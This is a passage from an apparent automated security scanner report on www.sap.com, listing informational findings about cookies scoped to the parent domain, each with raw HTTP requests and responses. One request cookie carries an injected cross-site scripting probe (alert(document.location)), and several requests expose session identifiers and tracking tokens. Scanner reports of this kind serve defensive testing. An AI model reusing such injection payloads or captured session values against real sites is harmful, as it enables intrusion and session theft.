User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43268
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:37 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...

11.20. http://www.sap.com/customer-showcase/innovation/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/innovation/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/innovation/index.epx?olt=CG4D999063 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:14 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:14 GMT
Content-Length: 39995


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...

11.21. http://www.sap.com/customer-showcase/meetcustomers/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/meetcustomers/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/meetcustomers/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42048
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:38 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...

11.22. http://www.sap.com/customer-testimonials/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-testimonials/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-testimonials/index.epx?_=1318688501071 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.comzzzzzz=yyyyy
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:39:12 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:39:12 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:39:12 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:39:12 GMT
Content-Length: 32648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.23. http://www.sap.com/gwtservice.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservice.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservice.epx?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http://www.sapbusinessoptimizer.com/&campaigncode=CRM-US10-SGE-FRBUSOPT HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 157
Content-Type: text/html; charset=utf-8
Location: https://www.sap.com/host.epx?kNtBzmUK9zU
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:14 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL%3bCRM-US10-SGE-FRBUSOPT&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL%3bCRM-US10-SGE-FRBUSOPT&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:14 GMT; path=/
Set-Cookie: OriginatingURL=http://www.sapbusinessoptimizer.com/; domain=.sap.com; path=/
Set-Cookie: SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; domain=.sap.com; path=/
Set-Cookie: pmeoriginalurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmereturnurl=%2fgwtservice.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:14 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.sap.com/host.epx?kNtBzmUK9zU">here</a>.</h2>
</body></html>

11.24. http://www.sap.com/gwtservices/httpBridge.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservices/httpBridge.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservices/httpBridge.epx?kNtBzmUK9zU=1&action=registrationLayer&refresh=false&redirect=https%3A%2F%2Fwww.sap.com%2Fprofile%2Flogin.epx%3Fpmelayer%3Dtrue%26kNtBzmUK9zU%3D1&dialog=http://www.sap.com/common/formAbandonWarning.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:34 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:26:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:34 GMT
Content-Length: 7669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...

11.25. http://www.sap.com/gwtservices/verifylogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservices/verifylogin.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2059162%26tstart%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:48 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:48 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:25:48 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:47 GMT
Content-Length: 21

var sap_token = null;

11.26. http://www.sap.com/hana/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /hana/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hana/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23602
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:17 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:17 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:17 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.27. http://www.sap.com/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:34 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:34 GMT
Content-Length: 20385


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.28. http://www.sap.com/lines-of-business/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /lines-of-business/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lines-of-business/index.epx?_=1318688587604 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:40:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:40:16 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:40:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:40:16 GMT
Content-Length: 24664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.29. http://www.sap.com/lines-of-business/lines-of-business-spotlight.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /lines-of-business/lines-of-business-spotlight.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lines-of-business/lines-of-business-spotlight.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22042
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:05 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:05 GMT; path=/
